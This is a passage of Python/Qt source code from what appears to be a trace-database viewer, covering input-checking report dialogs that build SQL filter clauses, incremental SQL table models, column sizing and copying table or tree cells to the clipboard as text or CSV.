    def ResizeColumnToContents(self, column, n):
        """Set the column width to fit the widest of the first n rows.

        Using the view's resizeColumnToContents() here is extremely slow
        so implement a crude alternative.  (Locals renamed so as not to
        shadow the builtins len() and max().)
        """
        mm = "MM" if column else "MMMM"
        font = self.view.font()
        metrics = QFontMetrics(font)
        max_width = 0
        for row in xrange(n):
            val = self.model.root.child_items[row].data[column]
            width = metrics.width(str(val) + mm)
            max_width = width if width > max_width else max_width
        # The header must fit as well
        val = self.model.columnHeader(column)
        width = metrics.width(str(val) + mm)
        max_width = width if width > max_width else max_width
        self.view.setColumnWidth(column, max_width)
    def ResizeColumnsToContents(self):
        # Base the widths on the first (up to) 100 rows
        n = min(self.model.root.child_count, 100)
        if n < 1:
            # No data yet, so connect a signal to notify when there is
            self.model.rowsInserted.connect(self.UpdateColumnWidths)
            return
        columns = self.model.columnCount()
        for i in xrange(columns):
            self.ResizeColumnToContents(i, n)
    def UpdateColumnWidths(self, *x):
        # This only needs to be done once, so disconnect the signal now
        self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
        self.ResizeColumnsToContents()
    def Find(self, value, direction, pattern, context):
        """Start an asynchronous find over the already-fetched rows."""
        self.view.setFocus()
        self.find_bar.Busy()
        self.finder.Find(value, direction, pattern, context, self.FindDone)
    def FindDone(self, row):
        self.find_bar.Idle()
        if row >= 0:
            self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
        else:
            self.find_bar.NotFound()
# Line edit data item
class LineEditDataItem(object):
	"""A labelled QLineEdit field for the report dialogs.

	Subclasses override DoValidate() to convert the raw input text into
	self.value (typically a SQL clause fragment).  On invalid input,
	self.error is set and shown via the parent dialog, and the text is
	turned red.
	"""
	def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
		self.glb = glb
		self.label = label
		self.placeholder_text = placeholder_text
		self.parent = parent
		self.id = id

		self.value = default

		self.widget = QLineEdit(default)
		self.widget.editingFinished.connect(self.Validate)
		self.widget.textChanged.connect(self.Invalidate)
		self.red = False
		self.error = ""
		self.validated = True

		if placeholder_text:
			self.widget.setPlaceholderText(placeholder_text)

	def TurnTextRed(self):
		# Indicate invalid input by turning the text red
		if not self.red:
			palette = QPalette()
			palette.setColor(QPalette.Text,Qt.red)
			self.widget.setPalette(palette)
			self.red = True

	def TurnTextNormal(self):
		if self.red:
			palette = QPalette()
			self.widget.setPalette(palette)
			self.red = False

	def InvalidValue(self, value):
		"""Record and display an 'invalid value' error for this field."""
		self.value = ""
		self.TurnTextRed()
		self.error = self.label + " invalid value '" + value + "'"
		self.parent.ShowMessage(self.error)

	def Invalidate(self):
		# Any edit invalidates the previous validation result
		self.validated = False

	def DoValidate(self, input_string):
		# Default validation: accept anything, stripped
		self.value = input_string.strip()

	def Validate(self):
		self.validated = True
		self.error = ""
		self.TurnTextNormal()
		self.parent.ClearMessage()
		input_string = self.widget.text()
		if not len(input_string.strip()):
			# Empty input is always valid and selects nothing
			self.value = ""
			return
		self.DoValidate(input_string)

	def IsValid(self):
		if not self.validated:
			self.Validate()
		if len(self.error):
			self.parent.ShowMessage(self.error)
			return False
		return True

	def IsNumber(self, value):
		"""Return True if 'value' is the canonical string form of an int."""
		try:
			x = int(value)
		except (ValueError, TypeError):
			# Narrowed from a bare 'except:' so unrelated errors propagate
			return False
		return str(x) == value
# Non-negative integer ranges dialog data item
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
	"""Dialog field accepting comma-separated integers and A-B ranges,
	converted into a SQL condition on 'column_name'."""

	def __init__(self, glb, label, placeholder_text, column_name, parent):
		super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)

		self.column_name = column_name

	def DoValidate(self, input_string):
		singles = []
		pairs = []
		for item in [part.strip() for part in input_string.split(",")]:
			if "-" not in item:
				if not self.IsNumber(item):
					return self.InvalidValue(item)
				singles.append(item)
			else:
				bounds = item.split("-")
				if len(bounds) != 2 or not self.IsNumber(bounds[0]) or not self.IsNumber(bounds[1]):
					return self.InvalidValue(item)
				pairs.append(bounds)
		clauses = [("(" + self.column_name + " >= " + lo + " AND " + self.column_name + " <= " + hi + ")") for lo, hi in pairs]
		if len(singles):
			clauses.append(self.column_name + " IN (" + ",".join(singles) + ")")
		self.value = " OR ".join(clauses)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
	"""Dialog field accepting a single integer greater than zero."""

	def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
		super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)

	def DoValidate(self, input_string):
		text = input_string.strip()
		if not self.IsNumber(text):
			return self.InvalidValue(input_string)
		number = int(text)
		if number <= 0:
			return self.InvalidValue(input_string)
		self.value = str(number)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
	"""Dialog field whose comma-separated values are looked up in a SQL
	table and converted into an 'IN ( ids )' condition.

	table_name / match_column identify the lookup table; column_name1
	(and optionally column_name2) name the columns to match against.
	"""
	def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
		super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)

		self.table_name = table_name
		self.match_column = match_column
		self.column_name1 = column_name1
		self.column_name2 = column_name2

	def ValueToIds(self, value):
		"""Return ids of rows whose match_column equals the given value."""
		ids = []
		query = QSqlQuery(self.glb.db)
		# Bind the user-typed value rather than concatenating it into the
		# statement, so quotes or other special characters cannot break
		# (or inject into) the SQL
		stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = ?"
		if query.prepare(stmt):
			query.addBindValue(value)
			if query.exec_():
				while query.next():
					ids.append(str(query.value(0)))
		return ids

	def DoValidate(self, input_string):
		all_ids = []
		for value in [x.strip() for x in input_string.split(",")]:
			ids = self.ValueToIds(value)
			if len(ids):
				all_ids.extend(ids)
			else:
				return self.InvalidValue(value)
		self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
		if self.column_name2:
			self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
class SampleTimeRangesDataItem(LineEditDataItem):
	"""Dialog field accepting comma-separated time ranges.

	Times may be absolute, or relative with an 'ms'/'us'/'ns' suffix
	(relative to the first sample time when non-negative, to the last
	when negative).  The validated value is a SQL condition on
	'column_name' expressed in sample ids, found by binary-searching the
	samples table by time.
	"""
	def __init__(self, glb, label, placeholder_text, column_name, parent):
		self.column_name = column_name

		# Id and time bounds of the samples table, used to clamp and
		# binary-search the requested ranges
		self.last_id = 0
		self.first_time = 0
		self.last_time = 2 ** 64

		query = QSqlQuery(glb.db)
		QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
		if query.next():
			self.last_id = int(query.value(0))
			self.last_time = int(query.value(1))
		QueryExec(query, "SELECT time FROM samples WHERE time != 0 ORDER BY id LIMIT 1")
		if query.next():
			self.first_time = int(query.value(0))
		if placeholder_text:
			# Show the valid absolute time span to the user
			placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)

		super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)

	def IdBetween(self, query, lower_id, higher_id, order):
		# Find a sample id strictly between lower_id and higher_id:
		# the lowest for order "", the highest for order "DESC"
		QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
		if query.next():
			return True, int(query.value(0))
		else:
			return False, 0

	def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
		"""Binary search for the sample id nearest to target_time.

		Returns the id as a string: with get_floor the highest id whose
		time is below target_time, otherwise the lowest id whose time is
		above it.  Gaps in the id sequence are skipped via IdBetween().
		"""
		query = QSqlQuery(self.glb.db)
		while True:
			next_id = int((lower_id + higher_id) / 2)
			QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
			if not query.next():
				# next_id does not exist: probe for a nearby existing id
				ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
				if not ok:
					ok, dbid = self.IdBetween(query, next_id, higher_id, "")
					if not ok:
						return str(higher_id)
				next_id = dbid
				QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
			next_time = int(query.value(0))
			if get_floor:
				if target_time > next_time:
					lower_id = next_id
				else:
					higher_id = next_id
				if higher_id <= lower_id + 1:
					return str(higher_id)
			else:
				if target_time >= next_time:
					lower_id = next_id
				else:
					higher_id = next_id
				if higher_id <= lower_id + 1:
					return str(lower_id)

	def ConvertRelativeTime(self, val):
		"""Convert an 'Nms'/'Nus'/'Nns' suffixed time to an absolute time
		string; values without a recognized suffix are returned unchanged."""
		mult = 1
		suffix = val[-2:]
		if suffix == "ms":
			mult = 1000000
		elif suffix == "us":
			mult = 1000
		elif suffix == "ns":
			mult = 1
		else:
			return val
		val = val[:-2].strip()
		if not self.IsNumber(val):
			return val
		val = int(val) * mult
		if val >= 0:
			# Non-negative offsets are relative to the trace start,
			# negative offsets to the trace end
			val += self.first_time
		else:
			val += self.last_time
		return str(val)

	def ConvertTimeRange(self, vrange):
		"""Convert [begin, end] times in place into sample id strings.

		Returns False if the range is malformed or lies entirely outside
		the trace."""
		if vrange[0] == "":
			vrange[0] = str(self.first_time)
		if vrange[1] == "":
			vrange[1] = str(self.last_time)
		vrange[0] = self.ConvertRelativeTime(vrange[0])
		vrange[1] = self.ConvertRelativeTime(vrange[1])
		if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
			return False
		# Clamp to the available time span
		beg_range = max(int(vrange[0]), self.first_time)
		end_range = min(int(vrange[1]), self.last_time)
		if beg_range > self.last_time or end_range < self.first_time:
			return False
		vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
		vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
		return True

	def AddTimeRange(self, value, ranges):
		"""Parse one 'begin-end' range and append it to 'ranges'.

		Either bound may itself be negative (a relative time), so the
		range can contain up to three '-' characters; n is adjusted to
		pick the '-' that actually separates the two bounds."""
		n = value.count("-")
		if n == 1:
			pass
		elif n == 2:
			if value.split("-")[1].strip() == "":
				# The second '-' presumably starts a negative end bound,
				# so split at the first '-'
				n = 1
		elif n == 3:
			# Presumably both bounds are negative: split at the second '-'
			n = 2
		else:
			return False
		pos = findnth(value, "-", n)
		vrange = [value[:pos].strip() ,value[pos+1:].strip()]
		if self.ConvertTimeRange(vrange):
			ranges.append(vrange)
			return True
		return False

	def DoValidate(self, input_string):
		ranges = []
		for value in [x.strip() for x in input_string.split(",")]:
			if not self.AddTimeRange(value, ranges):
				return self.InvalidValue(value)
		# Combine the id ranges into one SQL condition
		ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
		self.value = " OR ".join(ranges)
# Report Dialog Base
class ReportDialogBase(QDialog):
	"""Base dialog collecting report parameters.

	'items' is a sequence of factories, each creating one
	LineEditDataItem-derived field.  On Ok, the validated values are
	combined into self.report_vars ready for report creation.
	"""
	def __init__(self, glb, title, items, partial, parent=None):
		super(ReportDialogBase, self).__init__(parent)

		self.glb = glb

		self.report_vars = ReportVars()

		self.setWindowTitle(title)
		self.setMinimumWidth(600)

		self.data_items = [x(glb, self) for x in items]

		# partial selects an "AND ( ... )" fragment (appended to an
		# existing WHERE) rather than a complete "WHERE ..." clause
		self.partial = partial

		self.grid = QGridLayout()

		for row in xrange(len(self.data_items)):
			self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
			self.grid.addWidget(self.data_items[row].widget, row, 1)

		self.status = QLabel()

		self.ok_button = QPushButton("Ok", self)
		self.ok_button.setDefault(True)
		self.ok_button.released.connect(self.Ok)
		self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)

		self.cancel_button = QPushButton("Cancel", self)
		self.cancel_button.released.connect(self.reject)
		self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)

		self.hbox = QHBoxLayout()
		#self.hbox.addStretch()
		self.hbox.addWidget(self.status)
		self.hbox.addWidget(self.ok_button)
		self.hbox.addWidget(self.cancel_button)

		self.vbox = QVBoxLayout()
		self.vbox.addLayout(self.grid)
		self.vbox.addLayout(self.hbox)

		self.setLayout(self.vbox)

	def Ok(self):
		# Renamed from 'vars' so the builtin vars() is not shadowed
		report_vars = self.report_vars
		for d in self.data_items:
			if d.id == "REPORTNAME":
				report_vars.name = d.value
		if not report_vars.name:
			self.ShowMessage("Report name is required")
			return
		for d in self.data_items:
			if not d.IsValid():
				return
		# Skip the first item (the report name) when building the query
		for d in self.data_items[1:]:
			if d.id == "LIMIT":
				report_vars.limit = d.value
			elif len(d.value):
				if len(report_vars.where_clause):
					report_vars.where_clause += " AND "
				report_vars.where_clause += d.value
		if len(report_vars.where_clause):
			if self.partial:
				report_vars.where_clause = " AND ( " + report_vars.where_clause + " ) "
			else:
				report_vars.where_clause = " WHERE " + report_vars.where_clause + " "
		self.accept()

	def ShowMessage(self, msg):
		# Errors are shown in red in the status label
		self.status.setText("<font color=#FF0000>" + msg)

	def ClearMessage(self):
		self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
	"""Dialog gathering the selection criteria for a branch report."""

	def __init__(self, glb, parent=None):
		title = "Selected Branches"
		items = (lambda gl, pr: LineEditDataItem(gl, "Report name:", "Enter a name to appear in the window title bar", pr, "REPORTNAME"),
			 lambda gl, pr: SampleTimeRangesDataItem(gl, "Time ranges:", "Enter time ranges", "samples.id", pr),
			 lambda gl, pr: NonNegativeIntegerRangesDataItem(gl, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", pr),
			 lambda gl, pr: SQLTableDataItem(gl, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", pr),
			 lambda gl, pr: LineEditDataItem(gl, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", pr))
		super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
	"""Return the names of the selected events, in id order."""
	query = QSqlQuery(db)
	QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
	result = []
	while query.next():
		result.append(query.value(0))
	return result
# Is a table selectable
def IsSelectable(db, table, sql = "", columns = "*"):
	"""Return True if a trial SELECT on 'table' succeeds.

	Deliberately best-effort: used to discover which optional tables and
	views exist in the database, so a failing query just means False.
	"""
	query = QSqlQuery(db)
	try:
		QueryExec(query, "SELECT " + columns + " FROM " + table + " " + sql + " LIMIT 1")
	except Exception:
		# Narrowed from a bare 'except:' so e.g. KeyboardInterrupt escapes
		return False
	return True
# SQL table data model item
class SQLTableItem():
	"""One row of a SQL table model: a row number plus its column data."""

	def __init__(self, row, data):
		self.row, self.data = row, data

	def getData(self, column):
		"""Return the value held in the given column of this row."""
		return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
	"""Table data model populated incrementally from a SQL query."""
	progress = Signal(object)

	def __init__(self, glb, sql, column_headers, parent=None):
		super(SQLTableModel, self).__init__(parent)
		self.glb = glb
		self.more = True
		self.populated = 0
		self.column_headers = column_headers
		# Bind the column count now; SQLTableDataPrep may be overridden
		# on the instance, so it is looked up via self at call time
		n_columns = len(column_headers)
		self.fetcher = SQLFetcher(glb, sql, lambda q, n=n_columns: self.SQLTableDataPrep(q, n), self.AddSample)
		self.fetcher.done.connect(self.Update)
		self.fetcher.Fetch(glb_chunk_sz)

	def DisplayData(self, item, index):
		self.FetchIfNeeded(item.row)
		return item.getData(index.column())

	def AddSample(self, data):
		# Called by the fetcher for each new row; rows become visible
		# later, in Update()
		self.child_items.append(SQLTableItem(self.populated, data))
		self.populated += 1

	def Update(self, fetched):
		"""Reveal newly fetched rows to the view."""
		if not fetched:
			self.more = False
			self.progress.emit(0)
		n_new = self.populated - self.child_count
		if n_new > 0:
			first = self.child_count
			parent = QModelIndex()
			self.beginInsertRows(parent, first, first + n_new - 1)
			self.insertRows(first, n_new, parent)
			self.child_count += n_new
			self.endInsertRows()
			self.progress.emit(self.child_count)

	def FetchMoreRecords(self, count):
		rows_before = self.child_count
		if not self.more:
			self.progress.emit(0)
		else:
			self.fetcher.Fetch(count)
		return rows_before

	def HasMoreRecords(self):
		return self.more

	def columnCount(self, parent=None):
		return len(self.column_headers)

	def columnHeader(self, column):
		return self.column_headers[column]

	def SQLTableDataPrep(self, query, count):
		# Default preparation: one value per column
		return [query.value(i) for i in xrange(count)]
# SQL automatic table data model
class SQLAutoTableModel(SQLTableModel):
	"""SQLTableModel that discovers its columns automatically from the
	database schema for an arbitrary table or view name."""
	def __init__(self, glb, table_name, parent=None):
		# Fetch in chunks, resuming after the last id seen ($$last_id$$
		# is presumably substituted by SQLFetcher - TODO confirm)
		sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
		if table_name == "comm_threads_view":
			# For now, comm_threads_view has no id column
			sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
		column_headers = []
		query = QSqlQuery(glb.db)
		if glb.dbref.is_sqlite3:
			# SQLite: column names come from PRAGMA table_info (column 1)
			QueryExec(query, "PRAGMA table_info(" + table_name + ")")
			while query.next():
				column_headers.append(query.value(1))
			if table_name == "sqlite_master":
				# sqlite_master has no id column, so fetch it whole
				sql = "SELECT * FROM " + table_name
		else:
			# PostgreSQL: column names come from information_schema
			if table_name[:19] == "information_schema.":
				sql = "SELECT * FROM " + table_name
				select_table_name = table_name[19:]
				schema = "information_schema"
			else:
				select_table_name = table_name
				schema = "public"
			QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
			while query.next():
				column_headers.append(query.value(0))
		if pyside_version_1 and sys.version_info[0] == 3:
			# Override data preparation (before the base class captures
			# it) to work around PySide v1 mishandling large integers
			# under Python 3
			if table_name == "samples_view":
				self.SQLTableDataPrep = self.samples_view_DataPrep
			if table_name == "samples":
				self.SQLTableDataPrep = self.samples_DataPrep
		super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
	def samples_view_DataPrep(self, query, count):
		data = []
		data.append(query.value(0))
		# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
		data.append("{:>19}".format(query.value(1)))
		for i in xrange(2, count):
			data.append(query.value(i))
		return data
	def samples_DataPrep(self, query, count):
		data = []
		for i in xrange(9):
			data.append(query.value(i))
		# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
		data.append("{:>19}".format(query.value(9)))
		for i in xrange(10, count):
			data.append(query.value(i))
		return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
	"""Mixin providing fast column sizing for windows with a 'view' and
	a 'data_model' exposing child_items / columnHeader()."""

	def __init__(self, parent=None):
		super(ResizeColumnsToContentsBase, self).__init__(parent)

	def ResizeColumnToContents(self, column, n):
		# Using the view's resizeColumnToContents() here is extremely slow
		# so implement a crude alternative.
		# Note: renamed locals so the builtins max() and len() are not shadowed.
		font = self.view.font()
		metrics = QFontMetrics(font)
		max_width = 0
		for row in xrange(n):
			val = self.data_model.child_items[row].data[column]
			width = metrics.width(str(val) + "MM")
			max_width = max(max_width, width)
		val = self.data_model.columnHeader(column)
		width = metrics.width(str(val) + "MM")
		max_width = max(max_width, width)
		self.view.setColumnWidth(column, max_width)

	def ResizeColumnsToContents(self):
		# Size using only the first chunk of rows
		n = min(self.data_model.child_count, 100)
		if n < 1:
			# No data yet, so connect a signal to notify when there is
			self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
			return
		columns = self.data_model.columnCount()
		for i in xrange(columns):
			self.ResizeColumnToContents(i, n)

	def UpdateColumnWidths(self, *x):
		# This only needs to be done once, so disconnect the signal now
		self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
		self.ResizeColumnsToContents()
# Convert value to CSV
def ToCSValue(val):
	"""Convert a value to a CSV field, escaping and quoting as needed.

	Per RFC 4180, fields containing quotes, commas or line breaks must
	be quoted (the original omitted the line-break case, producing
	broken CSV for multi-line values).
	"""
	if '"' in val:
		val = val.replace('"', '""')
	if "," in val or '"' in val or "\n" in val or "\r" in val:
		val = '"' + val + '"'
	return val
# Key to sort table model indexes by row / column, assuming fewer than 1000 columns
glb_max_cols = 1000

def RowColumnKey(a):
	"""Sort key ordering model indexes row-major (by row, then column),
	assuming fewer than glb_max_cols columns."""
	return a.row() * glb_max_cols + a.column()
# Copy selected table cells to clipboard
def CopyTableCellsToClipboard(view, as_csv=False, with_hdr=False):
	"""Copy the selected table cells to the clipboard.

	as_csv   - produce CSV output, otherwise space-padded columns
	with_hdr - include column headers (ignored for a single cell)
	"""
	indexes = sorted(view.selectedIndexes(), key=RowColumnKey)
	idx_cnt = len(indexes)
	if not idx_cnt:
		return
	if idx_cnt == 1:
		with_hdr=False
	# Determine the bounding rectangle of the selection
	min_row = indexes[0].row()
	max_row = indexes[0].row()
	min_col = indexes[0].column()
	max_col = indexes[0].column()
	for i in indexes:
		min_row = min(min_row, i.row())
		max_row = max(max_row, i.row())
		min_col = min(min_col, i.column())
		max_col = max(max_col, i.column())
	if max_col > glb_max_cols:
		raise RuntimeError("glb_max_cols is too low")
	# Widest data value per column, for plain-text padding
	max_width = [0] * (1 + max_col - min_col)
	for i in indexes:
		c = i.column() - min_col
		max_width[c] = max(max_width[c], len(str(i.data())))
	text = ""
	pad = ""
	sep = ""
	if with_hdr:
		model = indexes[0].model()
		for col in range(min_col, max_col + 1):
			val = model.headerData(col, Qt.Horizontal)
			if as_csv:
				text += sep + ToCSValue(val)
				sep = ","
			else:
				c = col - min_col
				max_width[c] = max(max_width[c], len(val))
				width = max_width[c]
				align = model.headerData(col, Qt.Horizontal, Qt.TextAlignmentRole)
				if align & Qt.AlignRight:
					val = val.rjust(width)
				# Padding is deferred to the next value, so trailing
				# spaces are never emitted
				text += pad + sep + val
				pad = " " * (width - len(val))
				sep = " "
		text += "\n"
		pad = ""
		sep = ""
	last_row = min_row
	for i in indexes:
		if i.row() > last_row:
			# Start a new output line for each new selected row
			last_row = i.row()
			text += "\n"
			pad = ""
			sep = ""
		if as_csv:
			text += sep + ToCSValue(str(i.data()))
			sep = ","
		else:
			width = max_width[i.column() - min_col]
			if i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
				val = str(i.data()).rjust(width)
			else:
				val = str(i.data())
			text += pad + sep + val
			pad = " " * (width - len(val))
			sep = " "
	QApplication.clipboard().setText(text)
def CopyTreeCellsToClipboard(view, as_csv=False, with_hdr=False):
	"""Copy the selected tree cells to the clipboard.

	Assumes the selection is a contiguous run of rows (the tree views
	use ContiguousSelection).  In plain-text mode the tree structure is
	reproduced using indentation and expansion markers.
	"""
	indexes = view.selectedIndexes()
	if not len(indexes):
		return
	selection = view.selectionModel()
	# The first selected row is the one whose predecessor is not selected
	first = None
	for i in indexes:
		above = view.indexAbove(i)
		if not selection.isSelected(above):
			first = i
			break
	if first is None:
		raise RuntimeError("CopyTreeCellsToClipboard internal error")
	model = first.model()
	row_cnt = 0
	col_cnt = model.columnCount(first)
	max_width = [0] * col_cnt
	indent_sz = 2
	indent_str = " " * indent_sz
	expanded_mark_sz = 2
	if sys.version_info[0] == 3:
		# U+25BC / U+25B6: down- and right-pointing triangles
		expanded_mark = "\u25BC "
		not_expanded_mark = "\u25B6 "
	else:
		# Python 2: build the same UTF-8 marks from raw bytes
		expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xBC) + " ", "utf-8")
		not_expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xB6) + " ", "utf-8")
	leaf_mark = " "
	if not as_csv:
		# First pass: measure column widths over the selected rows
		pos = first
		while True:
			row_cnt += 1
			row = pos.row()
			for c in range(col_cnt):
				i = pos.sibling(row, c)
				if c:
					n = len(str(i.data()))
				else:
					# Column 0 also carries the indent and marker
					n = len(str(i.data()).strip())
					n += (i.internalPointer().level - 1) * indent_sz
					n += expanded_mark_sz
				max_width[c] = max(max_width[c], n)
			pos = view.indexBelow(pos)
			if not selection.isSelected(pos):
				break
	text = ""
	pad = ""
	sep = ""
	if with_hdr:
		for c in range(col_cnt):
			val = model.headerData(c, Qt.Horizontal, Qt.DisplayRole).strip()
			if as_csv:
				text += sep + ToCSValue(val)
				sep = ","
			else:
				max_width[c] = max(max_width[c], len(val))
				width = max_width[c]
				align = model.headerData(c, Qt.Horizontal, Qt.TextAlignmentRole)
				if align & Qt.AlignRight:
					val = val.rjust(width)
				# Padding is deferred to the next value, so trailing
				# spaces are never emitted
				text += pad + sep + val
				pad = " " * (width - len(val))
				sep = " "
		text += "\n"
		pad = ""
		sep = ""
	# Second pass: emit one output line per selected row
	pos = first
	while True:
		row = pos.row()
		for c in range(col_cnt):
			i = pos.sibling(row, c)
			val = str(i.data())
			if not c:
				# Prefix column 0 with indent and expansion marker
				if model.hasChildren(i):
					if view.isExpanded(i):
						mark = expanded_mark
					else:
						mark = not_expanded_mark
				else:
					mark = leaf_mark
				val = indent_str * (i.internalPointer().level - 1) + mark + val.strip()
			if as_csv:
				text += sep + ToCSValue(val)
				sep = ","
			else:
				width = max_width[c]
				if c and i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
					val = val.rjust(width)
				text += pad + sep + val
				pad = " " * (width - len(val))
				sep = " "
		pos = view.indexBelow(pos)
		if not selection.isSelected(pos):
			break
		# Strip any trailing padding before starting the next line
		text = text.rstrip() + "\n"
		pad = ""
		sep = ""
	QApplication.clipboard().setText(text)
def CopyCellsToClipboard(view, as_csv=False, with_hdr=False):
	"""Dispatch to the copy routine installed on the view (the table or
	tree variant is assigned to the view when it is created)."""
	copy_fn = view.CopyCellsToClipboard
	copy_fn(view, as_csv, with_hdr)

def CopyCellsToClipboardHdr(view):
	"""Copy the selection as plain text, including column headers."""
	CopyCellsToClipboard(view, False, True)

def CopyCellsToClipboardCSV(view):
	"""Copy the selection as CSV, including column headers."""
	CopyCellsToClipboard(view, True, True)
# Context menu
class ContextMenu(object):
	"""Right-click context menu for a view, offering copy actions."""

	def __init__(self, view):
		self.view = view
		self.view.setContextMenuPolicy(Qt.CustomContextMenu)
		self.view.customContextMenuRequested.connect(self.ShowContextMenu)

	def ShowContextMenu(self, pos):
		popup = QMenu(self.view)
		self.AddActions(popup)
		popup.exec_(self.view.mapToGlobal(pos))

	def AddCopy(self, menu):
		menu.addAction(CreateAction("&Copy selection", "Copy to clipboard", lambda: CopyCellsToClipboardHdr(self.view), self.view))
		menu.addAction(CreateAction("Copy selection as CS&V", "Copy to clipboard as CSV", lambda: CopyCellsToClipboardCSV(self.view), self.view))

	def AddActions(self, menu):
		# Subclasses override this to contribute extra actions
		self.AddCopy(menu)
class TreeContextMenu(ContextMenu):
	"""Context menu for tree views: adds a 'copy current cell text'
	action ahead of the standard copy actions."""

	def __init__(self, view):
		super(TreeContextMenu, self).__init__(view)

	def AddActions(self, menu):
		index = self.view.currentIndex()
		text = str(index.data()).strip()
		if len(text):
			menu.addAction(CreateAction('Copy "' + text + '"', "Copy to clipboard", lambda: QApplication.clipboard().setText(text), self.view))
		self.AddCopy(menu)
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
	"""MDI window displaying an arbitrary database table.

	A QSortFilterProxyModel sits between the view and the shared data
	model to provide per-column sorting.
	"""
	def __init__(self, glb, table_name, parent=None):
		super(TableWindow, self).__init__(parent)
		self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
		self.model = QSortFilterProxyModel()
		self.model.setSourceModel(self.data_model)
		self.view = QTableView()
		self.view.setModel(self.model)
		self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
		self.view.verticalHeader().setVisible(False)
		# Start unsorted (column -1), i.e. in fetch order
		self.view.sortByColumn(-1, Qt.AscendingOrder)
		self.view.setSortingEnabled(True)
		self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
		self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
		self.ResizeColumnsToContents()
		self.context_menu = ContextMenu(self.view)
		self.find_bar = FindBar(self, self, True)
		self.finder = ChildDataItemFinder(self.data_model)
		self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
		self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
		self.setWidget(self.vbox.Widget())
		AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
	def Find(self, value, direction, pattern, context):
		# The search runs on the underlying data model, not the proxy
		self.view.setFocus()
		self.find_bar.Busy()
		self.finder.Find(value, direction, pattern, context, self.FindDone)
	def FindDone(self, row):
		self.find_bar.Idle()
		if row >= 0:
			# Map the data model row through the sort proxy
			self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
		else:
			self.find_bar.NotFound()
# Table list
def GetTableList(glb):
	"""Return the names of all tables and views in the database, plus
	the schema tables appropriate to the database kind."""
	if glb.dbref.is_sqlite3:
		stmt = "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name"
	else:
